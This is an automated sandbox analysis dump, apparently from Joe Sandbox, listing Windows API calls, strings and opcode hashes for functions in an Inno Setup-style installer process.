                                                                                  • Instruction Fuzzy Hash: 91419771A00A189FCB14DF66CC85A9EB7B9EB88345F5044BAFC04E7342D6789F48CE58
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,0045DDB9), ref: 0045DCB0
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0045DD99,?,00000001,00000000,0045DDB9), ref: 0045DCF6
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0045DD7B,?,00000000,?,00000000,0045DD99,?,00000001,00000000,0045DDB9), ref: 0045DD5B
                                                                                  • FindClose.KERNEL32(000000FF,0045DD82,0045DD7B,?,00000000,?,00000000,0045DD99,?,00000001,00000000,0045DDB9), ref: 0045DD75
                                                                                  • SetErrorMode.KERNEL32(?,0045DDA0,0045DD99,?,00000001,00000000,0045DDB9), ref: 0045DD93
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$ErrorFileMode$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3300381671-0
                                                                                  • Opcode ID: 3bda4980059b4c560642d34aeda655ed1b53c34c157d288d985c2183c29251dd
                                                                                  • Instruction ID: aedbeba96e9afbfee60e3c75d99dfd13a2b10abcd8e0bc3fcd0148f4b27b04ea
                                                                                  • Opcode Fuzzy Hash: 3bda4980059b4c560642d34aeda655ed1b53c34c157d288d985c2183c29251dd
                                                                                  • Instruction Fuzzy Hash: FF31A475A006086FDB21EF61CC51BDEB7BCDB49704F5144B6BD08E7292D6389E48CE98
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 00478596
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004785B4
                                                                                  • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0048EF34,00477E34,00477E65,00000000,00477E85,?,?,00000001,0048EF34), ref: 004785D6
                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0048EF34,00477E34,00477E65,00000000,00477E85,?,?,00000001,0048EF34), ref: 004785EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$IconicLong
                                                                                  • String ID:
                                                                                  • API String ID: 2754861897-0
                                                                                  • Opcode ID: 16edf8713fd673d8ad8826d44a20992cdf7515152f7f8309029ddd15a7935073
                                                                                  • Instruction ID: 7f8cc89845bae1bc3380a3f87405d0c59a1e9ae527fb4684490bd01277d65bf3
                                                                                  • Opcode Fuzzy Hash: 16edf8713fd673d8ad8826d44a20992cdf7515152f7f8309029ddd15a7935073
                                                                                  • Instruction Fuzzy Hash: 98011E706912407AE710A77ACD8AB9B37955B09314F44487EFA089B3A2DF3DD885871D
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0045CC50), ref: 0045CBD4
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0045CC30,?,00000000,?,00000000,0045CC50), ref: 0045CC10
                                                                                  • FindClose.KERNEL32(000000FF,0045CC37,0045CC30,?,00000000,?,00000000,0045CC50), ref: 0045CC2A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 24b9f8422a3c96ecd869d0e611b6963d9d7011e710ef1829d0a1b4cca6bafe35
                                                                                  • Instruction ID: 13dc1bae311c792edd2c78937eb6e5637d0a38ef48518f112ec3a89576ce78c3
                                                                                  • Opcode Fuzzy Hash: 24b9f8422a3c96ecd869d0e611b6963d9d7011e710ef1829d0a1b4cca6bafe35
                                                                                  • Instruction Fuzzy Hash: 122196719047086EDB11DB669C81ADEB7BCDB49704F5084B7AC08E2262D6389E48CA58
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 0042415C
                                                                                  • SetActiveWindow.USER32(?,?,?,00465D47), ref: 00424169
                                                                                    • Part of subcall function 004235C4: ShowWindow.USER32(004105C8,00000009,?,00000000,0041ED1C,004238B2,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B84), ref: 004235DF
                                                                                    • Part of subcall function 00423A8C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,022625AC,00424182,?,?,?,00465D47), ref: 00423AC7
                                                                                  • SetFocus.USER32(00000000,?,?,?,00465D47), ref: 00424196
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveFocusIconicShow
                                                                                  • String ID:
                                                                                  • API String ID: 649377781-0
                                                                                  • Opcode ID: 9934a82e448f10eadb4869c6a7bad1e7c092c9c891abf8ad4518809b6db40668
                                                                                  • Instruction ID: 2c58c3527aa4735dc90405bf129a4788637ea02ec34073c054fc47696a0c0809
                                                                                  • Opcode Fuzzy Hash: 9934a82e448f10eadb4869c6a7bad1e7c092c9c891abf8ad4518809b6db40668
                                                                                  • Instruction Fuzzy Hash: E4F0307170011097CB00AFAAD888B9633A4AF08304B55447BBC04DF34BC67CDC518BA8
                                                                                  APIs
                                                                                  • ArcFourCrypt._ISCRYPT(?,?,?,lF,?,?,00466C0A,00000000), ref: 00459B2F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptFour
                                                                                  • String ID: lF
                                                                                  • API String ID: 2153018856-2753666250
                                                                                  • Opcode ID: 31d52d43b97b1e7fd84640527063688a62549a00690b83e7cc86ca3fb2b274e8
                                                                                  • Instruction ID: 4b75be74fdad0886da7a45274d0bc8ff0d1cb7473a84c6601643ea7bfbd02757
                                                                                  • Opcode Fuzzy Hash: 31d52d43b97b1e7fd84640527063688a62549a00690b83e7cc86ca3fb2b274e8
                                                                                  • Instruction Fuzzy Hash: 50C09BF200420CBF65005796ECC9C77B75CE69C6547404515F7044210195726C104775
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 00417C87
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417CA5
                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417CDB
                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D02
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Placement$Iconic
                                                                                  • String ID:
                                                                                  • API String ID: 568898626-0
                                                                                  • Opcode ID: 6c06cbcc0bcb90c85c164b184bd21dd72bd02783e38891700e02d566043d3be0
                                                                                  • Instruction ID: f43bd5f1f8682d616e5484505ef76a787571a2bacf3611272a058c3036bd4015
                                                                                  • Opcode Fuzzy Hash: 6c06cbcc0bcb90c85c164b184bd21dd72bd02783e38891700e02d566043d3be0
                                                                                  • Instruction Fuzzy Hash: 0D017131204104ABDB20EE69ECC1EE737A8AB59364F154166FD08CF246E638EC8087A8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CaptureIconic
                                                                                  • String ID:
                                                                                  • API String ID: 2277910766-0
                                                                                  • Opcode ID: dc62aa2563ee3f93b1734dc4af7e87f96bbb4b8185eb7050c27411ead72da3d0
                                                                                  • Instruction ID: c022c23749367c3961346563ea5922f48f742984696594645118b5adb12df01a
                                                                                  • Opcode Fuzzy Hash: dc62aa2563ee3f93b1734dc4af7e87f96bbb4b8185eb7050c27411ead72da3d0
                                                                                  • Instruction Fuzzy Hash: B9F08171B04601A7D720A72AD884ABB62B69F44358B54483FE405CBB66EB7CDCC0865C
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 00424113
                                                                                    • Part of subcall function 004239FC: EnumWindows.USER32(00423994), ref: 00423A20
                                                                                    • Part of subcall function 004239FC: GetWindow.USER32(?,00000003), ref: 00423A35
                                                                                    • Part of subcall function 004239FC: GetWindowLongA.USER32(?,000000EC), ref: 00423A44
                                                                                    • Part of subcall function 004239FC: SetWindowPos.USER32(00000000,004240D4,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,00424123,?,?,00423CEB), ref: 00423A7A
                                                                                  • SetActiveWindow.USER32(?,?,?,00423CEB,00000000,004240D4), ref: 00424127
                                                                                    • Part of subcall function 004235C4: ShowWindow.USER32(004105C8,00000009,?,00000000,0041ED1C,004238B2,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B84), ref: 004235DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2671590913-0
                                                                                  • Opcode ID: 58cf78bd06fefdfd51fea9d3674e980ce3ba34b6dc9536340d024524e6eda7a1
                                                                                  • Instruction ID: f0f74b20c9ca0de7600b08238eaecac06b6fcad8ed2adbe364b8db471fd1d592
                                                                                  • Opcode Fuzzy Hash: 58cf78bd06fefdfd51fea9d3674e980ce3ba34b6dc9536340d024524e6eda7a1
                                                                                  • Instruction Fuzzy Hash: 4CE01AA070010087EB01AF69DCC9F9672A4BF48304F55457ABC0CCF29BD67DC8908728
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0041274D), ref: 0041273B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: NtdllProc_Window
                                                                                  • String ID:
                                                                                  • API String ID: 4255912815-0
                                                                                  • Opcode ID: 75c759a170a64f104181379873fb29f3650c351a8a04a14ca9913a975bcac48a
                                                                                  • Instruction ID: 206c7191fb77546591064ccb4e896b6184ab7223317e1460509810b30cb6a505
                                                                                  • Opcode Fuzzy Hash: 75c759a170a64f104181379873fb29f3650c351a8a04a14ca9913a975bcac48a
                                                                                  • Instruction Fuzzy Hash: 0F510331208205CFDB10DB6AD68199BF3E5EF94304B34826BD854C7395DBB8ED91CB48
                                                                                  APIs
                                                                                  • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046696D), ref: 00459B42
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptFour
                                                                                  • String ID:
                                                                                  • API String ID: 2153018856-0
                                                                                  • Opcode ID: eaf489eb464e64ca939cc4d57eb3b1d69c265e2b924b1ea4193d5b890691a8b5
                                                                                  • Instruction ID: 182eedd2d78c393b493d72fe492972b20c7203261042ac92847319283a4d2022
                                                                                  • Opcode Fuzzy Hash: eaf489eb464e64ca939cc4d57eb3b1d69c265e2b924b1ea4193d5b890691a8b5
                                                                                  • Instruction Fuzzy Hash: 85A002F0B84304BAFD2157625E0EF2A252C97C4F01F2048587305A90D085A56400873E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2988995472.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2988897807.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2989077152.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_10000000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                  • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                  • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                  • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2988995472.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2988897807.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2989077152.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_10000000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                  • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                  • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(?,00418F68,00000000,?,?,?,00000001), ref: 0041F09E
                                                                                  • SetErrorMode.KERNEL32(00008000,?,00418F68,00000000,?,?,?,00000001), ref: 0041F0BA
                                                                                  • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F68,00000000,?,?,?,00000001), ref: 0041F0C6
                                                                                  • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F68,00000000,?,?,?,00000001), ref: 0041F0D4
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F104
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F12D
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F142
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F157
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F16C
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F181
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F196
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1AB
                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1C0
                                                                                  • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1D5
                                                                                  • FreeLibrary.KERNEL32(00000001,?,00418F68,00000000,?,?,?,00000001), ref: 0041F1E7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                  • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                  • API String ID: 2323315520-3614243559
                                                                                  • Opcode ID: 90ee75446a4de6348f655b39d60aa18055de910bda6a1e127df9e6b37d6133ef
                                                                                  • Instruction ID: 9b1a430dc604c7e924d07322e556a752c38594f5b7ba778193d9101a74ea8ca0
                                                                                  • Opcode Fuzzy Hash: 90ee75446a4de6348f655b39d60aa18055de910bda6a1e127df9e6b37d6133ef
                                                                                  • Instruction Fuzzy Hash: D3310AB0A01640BADF10EBA9FC46E6A37A4A7093187100D3FB108DB5E3E77D4885CB1C
                                                                                  APIs
                                                                                    • Part of subcall function 0041EE1C: GetCurrentThreadId.KERNEL32 ref: 0041EE6B
                                                                                    • Part of subcall function 0041EE1C: 73A25940.USER32(00000000,0041EDCC,00000000,00000000,0041EE88,?,00000000,0041EEBF,?,?,?,00000000), ref: 0041EE71
                                                                                  • CreateMutexA.KERNEL32(0048DA38,00000001,00000000,00000000,0045555E,?,00000000,00455580,?,00000000,004555AA,?,?,00000000,0048E628), ref: 004551CF
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,0048DA38,00000004,00000000,00002018,00000000), ref: 00455207
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,00455535,?,0048DA38,00000001,00000000,00000000,0045555E,?,00000000,00455580), ref: 0045522E
                                                                                  • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,00455535,?,0048DA38,00000001,00000000,00000000,0045555E,?,00000000), ref: 004552B2
                                                                                    • Part of subcall function 0042D714: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D727
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?,?,00000000,00000000,00000002,00000000,00000000), ref: 00455363
                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?,?,00000000,00000000,00000002,00000000), ref: 0045537A
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004553A6
                                                                                  • GetExitCodeProcess.KERNEL32(?,0048BEEB), ref: 004553C7
                                                                                  • CloseHandle.KERNEL32(?,004553F8,?,00000000,000000FF,000000FF,00000000,004553F1,?,?,00000000,00000000,00000000,00000000,00000001,04000000), ref: 004553EB
                                                                                    • Part of subcall function 004513F0: GetLastError.KERNEL32(00000000,00451E05,00000005,00000000,00451E3A,?,?,00000000,0048E628,00000004,00000000,00000000,00000000,?,0048B811,00000000), ref: 004513F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$CloseFileHandleMutexProcess$A25940CodeCurrentDirectoryErrorExitLastMappingMultipleObjectsReleaseSystemThreadViewWait
                                                                                  • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetExitCodeProcess$MapViewOfFile$MsgWaitForMultipleObjects$ReleaseMutex$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                                                  • API String ID: 2361223486-19128569
                                                                                  • Opcode ID: 805e98ebbe9f8fe3a6007e29e18282242a4d625b2a7f68a4447ba327f6d2f53b
                                                                                  • Instruction ID: 48faabca4fca4f82fe00d24a36f31f811c854f799892770257eb6afa5f3525dc
                                                                                  • Opcode Fuzzy Hash: 805e98ebbe9f8fe3a6007e29e18282242a4d625b2a7f68a4447ba327f6d2f53b
                                                                                  • Instruction Fuzzy Hash: 95718270A00649AFEB10EFA9CC51BAE77B5EB08305F60447AF904F7292D778A944CF58
                                                                                  APIs
                                                                                  • 73A1A570.USER32(00000000,?,0041A8BC,?), ref: 0041C9B8
                                                                                  • 73A24C40.GDI32(?,00000000,?,0041A8BC,?), ref: 0041C9C4
                                                                                  • 73A26180.GDI32(0041A8BC,?,00000001,00000001,00000000,00000000,0041CBDA,?,?,00000000,?,0041A8BC,?), ref: 0041C9E8
                                                                                  • 73A24C00.GDI32(?,0041A8BC,?,00000000,0041CBDA,?,?,00000000,?,0041A8BC,?), ref: 0041C9F8
                                                                                  • SelectObject.GDI32(0041CDB4,00000000), ref: 0041CA13
                                                                                  • FillRect.USER32(0041CDB4,?,?), ref: 0041CA4E
                                                                                  • SetTextColor.GDI32(0041CDB4,00000000), ref: 0041CA63
                                                                                  • SetBkColor.GDI32(0041CDB4,00000000), ref: 0041CA7A
                                                                                  • PatBlt.GDI32(0041CDB4,00000000,00000000,0041A8BC,?,00FF0062), ref: 0041CA90
                                                                                  • 73A24C40.GDI32(?,00000000,0041CB93,?,0041CDB4,00000000,?,0041A8BC,?,00000000,0041CBDA,?,?,00000000,?,0041A8BC), ref: 0041CAA3
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041CAD4
                                                                                  • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CB82,?,?,00000000,0041CB93,?,0041CDB4,00000000,?,0041A8BC), ref: 0041CAEC
                                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB82,?,?,00000000,0041CB93,?,0041CDB4,00000000,?), ref: 0041CAF5
                                                                                  • 73A18830.GDI32(0041CDB4,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB82,?,?,00000000,0041CB93), ref: 0041CB04
                                                                                  • 73A122A0.GDI32(0041CDB4,0041CDB4,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CB82,?,?,00000000,0041CB93), ref: 0041CB0D
                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041CB26
                                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 0041CB3D
                                                                                  • 73A24D40.GDI32(0041CDB4,00000000,00000000,0041A8BC,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CB82,?,?,00000000), ref: 0041CB59
                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041CB66
                                                                                  • DeleteDC.GDI32(00000000), ref: 0041CB7C
                                                                                    • Part of subcall function 00419FD0: GetSysColor.USER32(?), ref: 00419FDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                                  • String ID:
                                                                                  • API String ID: 1381628555-0
                                                                                  • Opcode ID: ad563364bc9ebb7d10c75dfb555ddca25a451b393e3f4226c66852b30b714789
                                                                                  • Instruction ID: aa4d6097afa02440e7fcbdb2d5802fa244371dba384f7146dad295a44c5a4dd1
                                                                                  • Opcode Fuzzy Hash: ad563364bc9ebb7d10c75dfb555ddca25a451b393e3f4226c66852b30b714789
                                                                                  • Instruction Fuzzy Hash: 4961D071A44644ABDF10EBE5DC86FDFB7B8EF48704F14446AF504E7281C67CA9408B68
                                                                                  APIs
                                                                                  • AllocateAndInitializeSid.ADVAPI32(0048D788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DE5E
                                                                                  • GetVersion.KERNEL32(00000000,0042E008,?,0048D788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DE7B
                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E008,?,0048D788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DE94
